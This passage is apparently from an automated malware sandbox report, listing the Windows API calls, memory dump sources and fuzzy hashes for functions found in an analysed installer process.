                                          • Instruction Fuzzy Hash: E4F02872A04704BBDB00EFB59C51A9EB7E8DB08711F1046BBFC04E3A92E77D5E048598
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CursorLoad
                                          • String ID:
                                          • API String ID: 3238433803-0
                                          • Opcode ID: 347c0409319e1f56965bdb416625521c8f9c73e06cce4d6ef72b792233170026
                                          • Instruction ID: 22188b5ea9937349a3dfd8468704a85441daf04a531a8cd34321fb41e475eefe
                                          • Opcode Fuzzy Hash: 347c0409319e1f56965bdb416625521c8f9c73e06cce4d6ef72b792233170026
                                          • Instruction Fuzzy Hash: ACF0AE21B001506A96109D3D5CC192A72A4DB853357A1033BFD3AC72D1CE2D5E415299
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetErrorMode.KERNEL32(00008000), ref: 0042E25A
                                          • LoadLibraryA.KERNEL32(00000000,00000000,0042E2A4,?,00000000,0042E2C2,?,00008000), ref: 0042E289
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: ErrorLibraryLoadMode
                                          • String ID:
                                          • API String ID: 2987862817-0
                                          • Opcode ID: 277a05c85ebec95b677daa7bb2482bbd2ca573b6d5e399c714ed0240645873e2
                                          • Instruction ID: eb4620433745d6aaadd7bf7ad3eeabb131aa5636b129577f515715ec8a0a4f24
                                          • Opcode Fuzzy Hash: 277a05c85ebec95b677daa7bb2482bbd2ca573b6d5e399c714ed0240645873e2
                                          • Instruction Fuzzy Hash: 3EF08271604B04BEDB119F779C6282BBAFCEB09B1479348B6F800A2691E53CA810D938
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ReadFile.KERNEL32(?,?,00000008,?,00000000,00000008,?,00000008,?,00450064,?,00000000,?,0048AAB4,00000000,0048AB11), ref: 00450027
                                          • GetLastError.KERNEL32(?,?,00000008,?,00000000,00000008,?,00000008,?,00450064,?,00000000,?,0048AAB4,00000000,0048AB11), ref: 00450036
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: ErrorFileLastRead
                                          • String ID:
                                          • API String ID: 1948546556-0
                                          • Opcode ID: c7ce94e31f8a084b0ea2430911861b691a4b1bf59cee07ff25789861d1a55257
                                          • Instruction ID: e382dd5a65e24b3f50033f774afbcb209a6bd790d932700bc5735f75aa734a37
                                          • Opcode Fuzzy Hash: c7ce94e31f8a084b0ea2430911861b691a4b1bf59cee07ff25789861d1a55257
                                          • Instruction Fuzzy Hash: 46E092652041506BEB20A65EA9C4F6B67DCCB89715F14407BF90CCB243D66CDC088779
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 004500AF
                                          • GetLastError.KERNEL32(?,?,?,00000000), ref: 004500B7
                                            • Part of subcall function 0044FFFC: GetLastError.KERNEL32(0044FD08,0044FE2D,?,00000000,?,0048AA7A,00000001,00000000,00000002,00000000,0048ABE3,?,?,00000005,00000000,0048AC17), ref: 0044FFFF
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: ErrorLast$FilePointer
                                          • String ID:
                                          • API String ID: 1156039329-0
                                          • Opcode ID: 5a7158e7444986506659a49d1eb44d979cf03257341ee793657bb57e050d1383
                                          • Instruction ID: 70d5300ea221fb13db4e7edc2c1539bb624e344269fe514c59b0ebe2e2d5d26d
                                          • Opcode Fuzzy Hash: 5a7158e7444986506659a49d1eb44d979cf03257341ee793657bb57e050d1383
                                          • Instruction Fuzzy Hash: AAE022363042009BD600E56DD880A9B73DCDF85364F140137B948CF1D1D621A8088735
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetFilePointer.KERNEL32(FC4CE8FF,00000000,?,00000001,0048B7FE,00000001,00450783,?,00000000,00000000,00000000,00000002,00000000,00475FEC), ref: 0044FEDF
                                          • GetLastError.KERNEL32(FC4CE8FF,00000000,?,00000001,0048B7FE,00000001,00450783,?,00000000,00000000,00000000,00000002,00000000,00475FEC), ref: 0044FEEB
                                            • Part of subcall function 0044FFFC: GetLastError.KERNEL32(0044FD08,0044FE2D,?,00000000,?,0048AA7A,00000001,00000000,00000002,00000000,0048ABE3,?,?,00000005,00000000,0048AC17), ref: 0044FFFF
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: ErrorLast$FilePointer
                                          • String ID:
                                          • API String ID: 1156039329-0
                                          • Opcode ID: cb60dc994fdb58f6fd30ee60fac722b43d5cb035f3fef4d40adc55dee35bcc8d
                                          • Instruction ID: a7619251b444916c8741956ff12f53e4d139a61023e0390af440e1e9bb03c50d
                                          • Opcode Fuzzy Hash: cb60dc994fdb58f6fd30ee60fac722b43d5cb035f3fef4d40adc55dee35bcc8d
                                          • Instruction Fuzzy Hash: B6E01A712006109BEB20EAB988C1A5372D8DB09365B248577E554CF2D6E674D8048B64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,00468817,00000000), ref: 004500E6
                                          • GetLastError.KERNEL32(00000000,00000000,00000000,00000002,?,?,00468817,00000000), ref: 004500EE
                                            • Part of subcall function 0044FFFC: GetLastError.KERNEL32(0044FD08,0044FE2D,?,00000000,?,0048AA7A,00000001,00000000,00000002,00000000,0048ABE3,?,?,00000005,00000000,0048AC17), ref: 0044FFFF
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: ErrorLast$FilePointer
                                          • String ID:
                                          • API String ID: 1156039329-0
                                          • Opcode ID: 1f84f636d7aed398e8a55002bd7b6dca9c86fe22014109fec411f3ec6dbebd78
                                          • Instruction ID: 478af2f33ebd703c0d4577f78845ebd3da7e59fffd56f8655c17aff3044c8671
                                          • Opcode Fuzzy Hash: 1f84f636d7aed398e8a55002bd7b6dca9c86fe22014109fec411f3ec6dbebd78
                                          • Instruction Fuzzy Hash: 12E012653483006BEB00EA7999C1B2732D8DB44704F14843BF944CF192E674DC489B25
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Global$Alloc
                                          • String ID:
                                          • API String ID: 2558781224-0
                                          • Opcode ID: 087fe30b21aebed1bbee58ca71e5d77df2e4e99abecd686fd89f03d3296f4ac7
                                          • Instruction ID: 07c32bc500a51529e755b4af09eba18ccb7fdb045e1456979bcc42b0c290a474
                                          • Opcode Fuzzy Hash: 087fe30b21aebed1bbee58ca71e5d77df2e4e99abecd686fd89f03d3296f4ac7
                                          • Instruction Fuzzy Hash: E89002C4950E0024DC40B2B20C0AD3F243CD8C071D3C0586E3100B6096883CB800483D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017F5), ref: 0040151B
                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017F5), ref: 00401542
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Virtual$AllocFree
                                          • String ID:
                                          • API String ID: 2087232378-0
                                          • Opcode ID: b47dfa8464c0bebe42472cbbc825c69c8bd26aa5f95237cd5ae25c2d008f6871
                                          • Instruction ID: 1d64295b8d0e0b9a38f8b2fc07ed469c99ec606e4b1f6f299006d044831eee91
                                          • Opcode Fuzzy Hash: b47dfa8464c0bebe42472cbbc825c69c8bd26aa5f95237cd5ae25c2d008f6871
                                          • Instruction Fuzzy Hash: 1FF0E2B2B0162027EB206A6A0C82B565A949BC5B94F154077FE09FF3D9D2798C0142A9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FlushFileBuffers.KERNEL32(?,00000000,004591B7,?,00000000,00000002,00000002), ref: 00459183
                                            • Part of subcall function 00450120: WriteFile.KERNEL32(?,?,00000000,00450352,00000000,00000000,?,?,?,00450352,00000000,00452881,?,0048B721,00000000,00452922), ref: 00450137
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: File$BuffersFlushWrite
                                          • String ID:
                                          • API String ID: 1012034594-0
                                          • Opcode ID: fc084228a5f3bce95dcc37af3930d5fd1fc9cfc622aaa5cead00cd3e00a863b0
                                          • Instruction ID: f6d7bcd8a638ef9ee0a8b890ff35cd320ba633cdf6a8f70c3da330163c3f7560
                                          • Opcode Fuzzy Hash: fc084228a5f3bce95dcc37af3930d5fd1fc9cfc622aaa5cead00cd3e00a863b0
                                          • Instruction Fuzzy Hash: FD51A434A002549BDB21DF25CC41ADAB3B5AB48305F0084EAED4DA7782DB78AEC98F54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SendNotifyMessageA.USER32(?,00000496,00002711,00000000), ref: 00473539
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: MessageNotifySend
                                          • String ID:
                                          • API String ID: 3556456075-0
                                          • Opcode ID: 406bfaa0a0f6461ebf3d20fd7c0a2e407c418e642052626433dcb6596332ea9e
                                          • Instruction ID: 5f26c846c874c237317d49b59e9284bb37dbd34ad5eabb797bc4cc63f3ee7dfb
                                          • Opcode Fuzzy Hash: 406bfaa0a0f6461ebf3d20fd7c0a2e407c418e642052626433dcb6596332ea9e
                                          • Instruction Fuzzy Hash: 1D419571701100ABC704FF67EC8195B3B99AB46309B50C57BE4189B3A6CB38DE42DB9D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetSystemDefaultLCID.KERNEL32(00000000,004087A6), ref: 0040868F
                                            • Part of subcall function 00406E80: LoadStringA.USER32 ref: 00406E9D
                                            • Part of subcall function 004085FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0048D4C0,00000001,?,004086C7,?,00000000,004087A6), ref: 0040861A
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: DefaultInfoLoadLocaleStringSystem
                                          • String ID:
                                          • API String ID: 1658689577-0
                                          • Opcode ID: 3e7ba4ed7f0e26770ecbfb831b7533beda94131ecb45f0d50b2354c16359b1b6
                                          • Instruction ID: 4f2eaf13373ec13ac649366da4b0d92ec9f087c8981b90d6854472f7e8ab8ab6
                                          • Opcode Fuzzy Hash: 3e7ba4ed7f0e26770ecbfb831b7533beda94131ecb45f0d50b2354c16359b1b6
                                          • Instruction Fuzzy Hash: F2314335E01119ABCB00EF95CC819DEB779FF84304F158577E819B7296E738AE058B98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FD01
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: InfoScroll
                                          • String ID:
                                          • API String ID: 629608716-0
                                          • Opcode ID: a1eb52f22b76c53ae760d0cba3ba0fee6ca67c4428f9ab82f3aa03e8c29a4ecf
                                          • Instruction ID: ae21a754651b4d7bfca8d8f1b928a50cbc9cc80607ce74b669d1fde158d67b9e
                                          • Opcode Fuzzy Hash: a1eb52f22b76c53ae760d0cba3ba0fee6ca67c4428f9ab82f3aa03e8c29a4ecf
                                          • Instruction Fuzzy Hash: CB2162B0604745AFD340DF39944069ABBE4BB88344F04493EE488C3341E378E995DBD6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: FileWrite
                                          • String ID:
                                          • API String ID: 3934441357-0
                                          • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                          • Instruction ID: 194a9317b808103a3cf425769d835fc826ab437ab4d68aafd0f4452bf6879e62
                                          • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                          • Instruction Fuzzy Hash: D4F09030205109DBEF1CCF58D0658BF77B0EB48300B2081AFE50B873A0D634AE80D758
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CreateWindow
                                          • String ID:
                                          • API String ID: 716092398-0
                                          • Opcode ID: 795260cd6bd7fdc1189ff6fc4d2ff421b563323c442d0d232bced7d330843685
                                          • Instruction ID: 4784d57ee1b8f141bf40eedc12857ac45983dbc9b624a9f018a5b701f057f4d2
                                          • Opcode Fuzzy Hash: 795260cd6bd7fdc1189ff6fc4d2ff421b563323c442d0d232bced7d330843685
                                          • Instruction Fuzzy Hash: 79F025B2601510AFDB94CF9CD8C0F9373ECEB0C210B0885A6FA08CF24AD264EC108BB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00414AB7
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CallbackDispatcherUser
                                          • String ID:
                                          • API String ID: 2492992576-0
                                          • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                          • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                          • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                          • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WriteFile.KERNEL32(?,?,00000000,00450352,00000000,00000000,?,?,?,00450352,00000000,00452881,?,0048B721,00000000,00452922), ref: 00450137
                                            • Part of subcall function 0044FFFC: GetLastError.KERNEL32(0044FD08,0044FE2D,?,00000000,?,0048AA7A,00000001,00000000,00000002,00000000,0048ABE3,?,?,00000005,00000000,0048AC17), ref: 0044FFFF
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: ErrorFileLastWrite
                                          • String ID:
                                          • API String ID: 442123175-0
                                          • Opcode ID: b751efd3255d4a841dc3e1fe7360b7965272101c70944bba4a060f8c7084cced
                                          • Instruction ID: 708f7d19b7bcbf48abda36036a02f36691c1a97e19eb5ff369bf5b20e2c6477e
                                          • Opcode Fuzzy Hash: b751efd3255d4a841dc3e1fe7360b7965272101c70944bba4a060f8c7084cced
                                          • Instruction Fuzzy Hash: D6E01A763041206BEB14E65AD980FABA7DCDF86365F10407BB918DB216D664EC088B7A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0042CBC4: CharPrevA.USER32(00000000,00000000,?,?,?,00000000,0042CD0A,00000000,0042CD30,?,?,?,00000000,00000000,?,0042CD45), ref: 0042CBEC
                                          • 6CF478A0.KERNEL32(00000000,00000000,0042CD30,?,?,?,00000000,00000000,?,0042CD45,00450C87,00000000), ref: 0042CD13
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CharF478Prev
                                          • String ID:
                                          • API String ID: 808134145-0
                                          • Opcode ID: 826422539118c00cb358ad14803f379a64015754f7d17351edbefb4b4b434a86
                                          • Instruction ID: 4939b6534ddec3ce97c59771d6a4ebc4ee53a512033a795d2a80a6faa40a6cb6
                                          • Opcode Fuzzy Hash: 826422539118c00cb358ad14803f379a64015754f7d17351edbefb4b4b434a86
                                          • Instruction Fuzzy Hash: AFE065313047147FD701EAA29C92A5EBAACDB45714B91487AB40093591D57C6E009858
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • 6CAD5CA0.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 0044FEBC
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2c645d677b9617e3fa70d0f2cdd418801873c83c401aa0c5be87cbbb6da078ae
                                          • Instruction ID: f45267872a4a72777867b24b92ebb1a1d10bd6d72e18b8631547a6d02b440940
                                          • Opcode Fuzzy Hash: 2c645d677b9617e3fa70d0f2cdd418801873c83c401aa0c5be87cbbb6da078ae
